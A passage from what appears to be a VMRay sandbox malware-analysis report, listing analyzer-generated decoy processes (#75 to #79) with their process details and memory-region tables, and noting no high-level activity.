| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #75: les lodging.exe
0
0
| Information | Value |
|---|---|
| ID | #75 |
| File Name | c:\program files (x86)\windows media player\les lodging.exe |
| Command Line | "C:\Program Files (x86)\Windows Media Player\les lodging.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Media Player\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x718 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DA4
0x
710
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00123fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00273fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00280fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00291fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00430000 | 0x004edfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00777fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x009d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x00a97fff | Pagefile Backed Memory | r |
|
|
|
- |
| les lodging.exe | 0x00b50000 | 0x00b66fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x01f6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x0206ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee10000 | 0x7ee10000 | 0x7ef0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef10000 | 0x7ef10000 | 0x7ef32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef33000 | 0x7ef33000 | 0x7ef35fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef39000 | 0x7ef39000 | 0x7ef39fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef3c000 | 0x7ef3c000 | 0x7ef3efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef3f000 | 0x7ef3f000 | 0x7ef3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #76: normally.exe
0
0
| Information | Value |
|---|---|
| ID | #76 |
| File Name | c:\program files (x86)\windows multimedia platform\normally.exe |
| Command Line | "C:\Program Files (x86)\Windows Multimedia Platform\normally.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Multimedia Platform\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x838 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DA0
0x
ACC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000840000 | 0x00840000 | 0x0084ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x00853fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x00860fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x00883fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x009cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x009d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x009e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x009f1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00a00000 | 0x00abdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b10000 | 0x00b10000 | 0x00b1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b20000 | 0x00b20000 | 0x00b23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b30000 | 0x00b30000 | 0x00b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00eaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000eb0000 | 0x00eb0000 | 0x01037fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001040000 | 0x01040000 | 0x010f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| normally.exe | 0x01130000 | 0x01146fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x012d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000012e0000 | 0x012e0000 | 0x026dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007edc0000 | 0x7edc0000 | 0x7eebffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eec0000 | 0x7eec0000 | 0x7eee2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eee5000 | 0x7eee5000 | 0x7eee7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeeb000 | 0x7eeeb000 | 0x7eeebfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeec000 | 0x7eeec000 | 0x7eeeefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeef000 | 0x7eeef000 | 0x7eeeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #77: dir.exe
0
0
| Information | Value |
|---|---|
| ID | #77 |
| File Name | c:\program files\windows photo viewer\dir.exe |
| Command Line | "C:\Program Files\Windows Photo Viewer\dir.exe" |
| Initial Working Directory | C:\Program Files\Windows Photo Viewer\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4b8 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D9C
0x
B58
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000420000 | 0x00420000 | 0x0042ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x00433fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x00440fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00463fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005d1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x00620fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x00643fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x007a0000 | 0x0085dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00917fff | Pagefile Backed Memory | r |
|
|
|
- |
| dir.exe | 0x00950000 | 0x00966fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00bf7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c00000 | 0x00c00000 | 0x00c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d50000 | 0x00d50000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d60000 | 0x00d60000 | 0x00ee0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x022effff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f610000 | 0x7f610000 | 0x7f70ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f710000 | 0x7f710000 | 0x7f732fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f733000 | 0x7f733000 | 0x7f735fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f739000 | 0x7f739000 | 0x7f739fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f73c000 | 0x7f73c000 | 0x7f73efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f73f000 | 0x7f73f000 | 0x7f73ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #78: baseball-showing-idaho.exe
0
0
| Information | Value |
|---|---|
| ID | #78 |
| File Name | c:\program files (x86)\google\baseball-showing-idaho.exe |
| Command Line | "C:\Program Files (x86)\Google\baseball-showing-idaho.exe" |
| Initial Working Directory | C:\Program Files (x86)\Google\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xadc |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D98
0x
AC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x009affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x009c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x009e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x00a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00b2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x00b33fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b40000 | 0x00b40000 | 0x00b40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00b51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00ba0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x00bb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000bc0000 | 0x00bc0000 | 0x00bcffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00bd0000 | 0x00c8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d50000 | 0x00d50000 | 0x00e4ffff | Private Memory | rw |
|
|
|
- |
| baseball-showing-idaho.exe | 0x00ea0000 | 0x00eb6fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000fc0000 | 0x00fc0000 | 0x01147fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x012d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000012e0000 | 0x012e0000 | 0x026dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000026e0000 | 0x026e0000 | 0x02797fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0283ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002840000 | 0x02840000 | 0x0293ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74610000 | 0x7462cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb70000 | 0x7eb70000 | 0x7ec6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ec70000 | 0x7ec70000 | 0x7ec92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ec93000 | 0x7ec93000 | 0x7ec95fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec96000 | 0x7ec96000 | 0x7ec96fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec9c000 | 0x7ec9c000 | 0x7ec9efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec9f000 | 0x7ec9f000 | 0x7ec9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #79: returned.exe
0
0
| Information | Value |
|---|---|
| ID | #79 |
| File Name | c:\program files (x86)\msbuild\returned.exe |
| Command Line | "C:\Program Files (x86)\MSBuild\returned.exe" |
| Initial Working Directory | C:\Program Files (x86)\MSBuild\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xad4 |
| Parent PID | 0x57c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D94
0x
AD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00400fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00423fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00573fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00580fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x00591fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00700000 | 0x007bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00a87fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000af0000 | 0x00af0000 | 0x00c70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d40000 | 0x00d40000 | 0x00df7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| returned.exe | 0x01070000 | 0x01086fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001090000 | 0x01090000 | 0x0248ffff | Pagefile Backed Memory | r |
|
|
|
- |
